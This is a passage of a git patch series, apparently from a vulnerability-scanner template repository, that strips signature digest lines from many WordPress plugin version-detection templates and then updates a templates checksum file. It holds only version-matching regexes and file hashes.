b/http/technologies/wordpress/plugins/updraftplus.yaml index 2c577a9eca..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205d95195fd7be3f56980e74ac5abade078ff24508114b6191cabba46fbc55c2c30220763bdada348adb9d13f8c51c294fbbd2f8d8044cf4f98c32df1db3df3eeab2f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 301697b98b..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c8a0f89afd03387a92837eaab73fe85724099cc49b3eacb40f48de167583cab70220620b30eef6009e96a7fcd892e9ea600b243461bb037cb3498d1276985a81a373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index f6155718eb..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bee8f6fb945dbd83e4949dbbc0b9fdce63433ebd993e28df68f0f2375171c8c902210081e1b5f9291c264f5b5030caedd72841579041e82e84c45b7a09099456c31649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index c4bd336f65..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206780f4de9bc5e7fe2e7d2e0b73df491dd139dfb45696a41f1a53249f03fd1378022100a0e39882437b66ddad0d84b6c290650102dd6baac085f4db7a841b8323869b9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index f2f78abb44..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075fa8f7c619bf053e75a72c3630f3c6444d51dab22ad8a8377ca686c44b8d653022100d9fe8eeabbd939707d5b8b97fb1efc52fb76afe3f4509a7bf9db9fdc3a1c5ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index d6573fdbe6..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210085b9974d49f8b298a639be0abbd5d03fdea2b9adcd81256ee1801dfbd1b9b40a02203755f6d57fa118824b29bf8aae1f94aa44c9327721cc22e48f741550e6c079f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 9f979318ef..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b5c421bb1b1402256006f27b304714e5e384707ab926f23b47c213f42905e960220518722e211d4addf4612c3e5231b78fa11da1987d7872c7a6c79d1f08fc2cd0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 19d9cc724c..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220788e80ac4566889eb78190cf3d1508be6e69087fb3b4a21831b4eb1a9e4fd253022100accb3a4a0a096b89acadf7e116db00f8850386d37c2aa82b2d23394e0e5a5475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 70a043541d..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ffd26e57c63a6290110f086e00d6e3abe660b84f2df00325b979321ad0f58878022067f7852b3e0a5a818908743173e1389679b80fd0be806be0816339b8bd30c2af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 95a5fc4896..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0d388e4fdc7516b74ed1aa3e70ed26933fefd5ecff50cbbfb88a7528e454902022023e7776e9fb7f103dae727ee82a6609a3f0706d34d5e48e4fee511804b6897b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index f309fb1f75..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a9b2fef53acae584e7a10280cafa4a7240cc71c2352d74da2a8526fd37dbe81022100c8ce1788d8c97ac07ba82ed0fab26391c0706edaa4d225306051a21e13f3ca22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index f57cc156a6..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cfa8880dc838e22c65ed5c9013110f17dfef6ab6077c4202d3dbbb3cf51300d502207fd42e80127db34a4546a6e85501b8d0c15a6e49869cb6728dbd60838cadb958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 05b232c44e..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008318c60da1a0c25debe038daccc004010016a51a37f2d10cedc2776718a68739022056933c41e3802a99738f8091979053549f094948674ff67baa262790efebb136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 90a9aa9001..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220603a21711fe7289dbd06910d6262b218197d3a8a352238aaf0ed403f74a69ded022100be547240379040a7eb977886853788409f54bfde503b9ffe2c9860e64b191cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 6bdc66868f..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d95a041c3dfb00721b9ce0a61b92a4907da9e4eced32918a45f4c9559a57b9c0221008f93ce76db78882935d4e4775831c975336b0e52dddfec96cc5a5074b8219f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e133225733..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066148892b979901476b9f0108534131f319b6e4540f3cabf92eb97fbaa5cab37022100b0c7676bb6b0d204f144cf096b5f72d2971b0d968938646531eef04c7e542cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 71a83d1b42..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e592530308b14e7149c66a597018644cbf23cf13dca78dd49f47cbfdec988478022100d2caa0dd8c68fa28a97fc50ca9637f67ff701a1fdc75b39225ed38c3665ba691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index b66fde0900..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b606fb2bedaf68be78a980e352743cbc90e59b8feacc8f35ce44a0139f401ed6022100ffe71cb7fc3b57f8ddb3b1b1f013bd6ac632811003b32eda16167352c56c2a75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 2cb9617e38..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e50bfb9524188cf97196c6171c59fa1814a8b848f01a5f68805756c96c42784022048388a421725f5b20464b6d81b11e21cc26a27460cc173b41cc1f49ad470bd23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 424e4f305e..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022067640e49dce6dddaeb3d3ee80f24f2162f59b02eadf5307069b65592beb73019022100a31baa96c266bfc3694b21cbc736f3638f3b71477a33d23a16075ab7ba9b4357:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 44b5c71ea4..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220578758d4a6f28b1b04a2af66495c09afff19d3eab550e0f7832e01de63ce09a3022100ac7c723a394a379e84ff1b0fffc4e3e6a503a164bd81a7535085dc2dbaddf6c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 456c2f04bb..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206dc056bdfceca6adbf103e5611c4cd676ccb93097745f3fcf12df147b4eafb7a022100e5b1f79a4ec79aa2a62cdd45595b3b96f7c3dbfa24704bd570ddd47c4694f587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index b25753130e..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b8567319c29881ebf351d707b15e369b7184a30714482ebb19f58d983a337bbc02202ec33894a6733840432a8da2d452133970fc957d1f442487d32f29ad8b28a33b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ace5e6d930..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab41c6809a710e39759a6e02f13dc844d5f98fe5375bdf305147c66339fbb2b4022100d2a0f788eed4bac566e0a3426285412173e6a85428fe2d6188517b5851b19fa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index fdc825685d..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202f2b01ae098b85290607d70cefd4ae212f62f13b66362fdcd4fd992735567cc50220554102bcfe210990660bf55404a624591b4fe770d95e2a5f31a07a1c603622de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 7fc1211e34..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022066b6a627b7b9e30abf78763367d4206239b649bf757fde8eee5cbcd8127f042b02201798c1e71f5750f4d0c4bde01616926af14d39cf9129fbbdaf2ac77456124670:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 02fa3f5d17..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d362653cf02809174e3f45294baf9379b917c3ada2ef1dbfdbb9752f4102b59a022100971442760969beb0168388cdeebdbf0ce1b0f0dc9121b1e1b2ed241932649ff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 1b6862d9b0..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220605db72b14761004ad106ac6aecc8765650616f12ebfe41fabcd2cc0cecf3a5b022100acd57e8a42d29a00bd6e1d22e0bca17b0dbdb6b6b9728e7d9cacdd7f927008a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 340f090f89..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220767b8bc3322ccfa62db604150b5324e3febd2aae4c15d001c72f22334002ec63022100b8f9154a27812578370ef241b47266ba1f881a4b146ccf97bc8657c2e8320107:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 4a777adda1..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b42392a4657abacba81c57b65a525970a1e1499742922081be5c4bd21fe3d484022100e5f3948f1aceeb3cbe79c340e4581cd1582b378d55c1f45b40ad8d69d0c6ef1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index b383b28c2d..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205302ec255592f56391118be8c08a03bdcee5cf57bfc2046e2fd853a3771f188a02202359f4ac918134e36cce9f1d33ac4881e22720135f378bf60725e4cb22a1de01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 1f8203b9aa..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022051b2bd8eaeaf4d958d3dbe685e1e3c9d6d22a3be85b52671209e874c8219f05f022074e8de4fb0f905f5faa306352ff9bc970425a7f0ac08231e798277592e870a25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 528f9b792b..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b968e3cdf4b0be69f03c181a9cda08db229fdd53d6ee48f0cda9124b66045eb022100b8594c29352e47b68354ec9e58c1ad01e10e8ff8fbbf0b3f66ece4db631c0f5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 3cc41d7dcb..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ac020c274d6c4ad6129954549c93cbab8204f7825e395d0f6ed5aa78c6df040a022100ffa8ff67eeaea802fdf67880fc8aead9c406a285108fe84c09cbc44e624517c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 80e39a6133..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f1a6c6f782421fc7df14608b8b71f6bf6b0c7ed245d1b5fb6909fdc488b7bb60221008f5b9b4777514933d700c3c3da8ac90e1d0d6cde5173f7d6f69ca85231cc0ab1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index c229c14372..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220053ce011fe3003b2d8667a408fe2aef8d1b1dfcb7d6d3de2389cc2cbea422e68022100d64c8ca823cbbcaef83bbef9a39a81cf60d68060ff036a257018499e38922cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 82171e13c9..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d618722483cd7d8d316cd853e10fd1ccf6df5963a0bc55859fda33084b91a3d3022100ca2691cfad924ecc1febbe93f3fd7db81efc559c4297816d7f99a92af59222b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 8445e1fa35..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b787dead769ad9fb459a645ee3d534a94f5e028468086b00be02bb75a27567b602207c054ba78009b7b036d99a702defb099c0ecf7f0105915336f21e568c49b04a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 4387693fcf..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220050b2857d82582275fa381f4f8e8161c72eed160fdbbedfa31b70fa278f933de022100a698dae0893080222f22d4c64ea90207b7572f91118aed1fcbac32837d06e869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 1a3155040c..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203871679df6ab4546c38717a9054a1521b74ad24422eca6259fffa71dcdb73a7002200cd764dea774c7a8649375ee0e31486a783ac10a1b9fe95dcdc5974e43cdbe2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 7081bc90b2..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100edd65841adc632e9e8da73773bbca08bb9d74ec7e3c5b748566e143cc5e85d0b022053171eedf9460cd5bf325357574144b9336380a9151e1fbe2ee92cf4cb40ad8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 71a25cdd57..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220044e88e7d061ddb2a7e8c30eb0aba58b26f23cf2899cb9f1aeba14342360972502206f29b559fec4183aafacf68d7d332d3482931d7fc9bc083e96fe1473b6066c03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 64cb523d50..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220134ce8cb0aadc8a05f4ba39c5da7effa1754810de3683863164f041ca077c1160220795c76f73c3dff3a81ce7191948c85eea0ee4be9d37a65dc6577c5cac5576709:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 3d23bbbdef..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022063bd5f8beada56e56be41500d4db0ebd3d1e5d06e77b63fe684ff72e71d474be022023fcdae5cb0df3671eafdd54ef2deeae3f2407ddeee5814d0d0386dfbc5fce04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From bdf8403497f6f43ece411abd0dd059d755d80b56 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 31 Jul 2024 09:40:46 +0000 Subject: [PATCH 1779/1841] Auto Generated Templates Checksum [Wed Jul 31 09:40:46 UTC 2024] :robot: --- templates-checksum.txt | 409 +++++++++++++++++++++-------------------- 1 file changed, 205 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 494222665a..6d3175c9a5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -802,7 +802,7 @@ helpers/wordpress/plugins/fluent-smtp.txt:730bd727b3c4db45a22275182f1cbd51573c4f helpers/wordpress/plugins/fluentform.txt:07a5fc939d521fc5aae661b0db19ad0295cc84ef helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 -helpers/wordpress/plugins/formidable.txt:4c8c0a65f9f10ab6175d297b0d38cb82de78d3a8 +helpers/wordpress/plugins/formidable.txt:55f95212bff66efb905db54542360e5ae615d9ad helpers/wordpress/plugins/forminator.txt:bc78bd77fb0b7968fa063868c2ab8461de5d9da5 helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d833a5c55075 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93027a7d59f0e18 @@ -842,7 +842,7 @@ helpers/wordpress/plugins/loginizer.txt:57f75e869bf26cdb7eaddcd7bb1de6cfbb0594c3 